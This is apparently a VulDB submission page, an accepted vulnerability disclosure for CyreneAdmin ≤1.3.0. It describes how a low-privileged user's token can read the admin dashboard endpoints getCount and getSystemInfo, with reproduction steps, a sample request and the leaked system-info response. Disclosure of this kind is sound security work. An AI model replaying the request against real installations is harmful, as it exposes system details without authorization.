提出 #754242: CoCoTeaNet CyreneAdmin ≤1.3.0 Broken Access Control情報

タイトルCoCoTeaNet CyreneAdmin ≤1.3.0 Broken Access Control
説明**Title:** Broken Access Control on Dashboard System Info Endpoints **BUG_Author:** sageee **Affected Version:** CyreneAdmin (Current GitHub Head) **Vendor:** CoCoTeaNet GitHub Repository **Software:** CyreneAdmin **Vulnerability Url:** ● /api/system/dashboard/getCount ● /api/system/dashboard/getSystemInfo **Description:** The application fails to properly enforce role-based access control (RBAC) on sensitive system monitoring endpoints. 1. Under normal circumstances, unauthorized access to restricted administrative interfaces results in a specific error response: `{"code": 4002, "message": "无权限访问"}`. 2. However, a standard user (e.g., username `test`) with low privileges is able to bypass this check and successfully request `/api/system/dashboard/getCount` and `/api/system/dashboard/getSystemInfo`. 3. Instead of receiving the 4002 error, the server returns sensitive system environment data (OS, Java version) and business statistics, leading to Information Disclosure and Broken Access Control. **Reproduction Steps:** 1. Login to the application using a standard user account (e.g., `test`). 2. Obtain the valid authentication token (Authorization header) for this low-privileged user. 3. Send a GET request to the administrative endpoints. **Vulnerability Request & Response Analysis:** **Request:** ```http GET /api/system/dashboard/getSystemInfo HTTP/1.1 Host: localhost:8080 Authorization: [Standard_User_Token] User-Agent: Mozilla/5.0 ``` **Vulnerable Response (Actual):** The server returns HTTP 200 with system details, bypassing the permission check. ```json { "code": 200, "msg": "操作成功", "data": { "osName": "Windows 11", "osArch": "amd64", "javaVersion": "1.8.0_301", "userDir": "C:\\Users\\Admin\\CyreneAdmin", "cpuUsage": 15.5, "memUsage": 45.2 } } ``` **Contrast with Secure Behavior:** If the access control were working correctly, the server should have returned the following denial message (which it failed to do): ```json { "code": 4002, "data": null, "message": "无权限访问", "time": "2026-02-08 20:39:58" } ```
ユーザー
 sageee (UID 82251)
送信2026年02月08日 14:12 (4 月 ago)
モデレーション2026年02月18日 15:20 (10 days later)
ステータス承諾済み
VulDBエントリ346493 [CoCoTeaNet CyreneAdmin 迄 1.3.0 System Info Endpoint getCount 特権昇格]
ポイント17

概要

Do you need the next level of professionalism?

Upgrade your account now!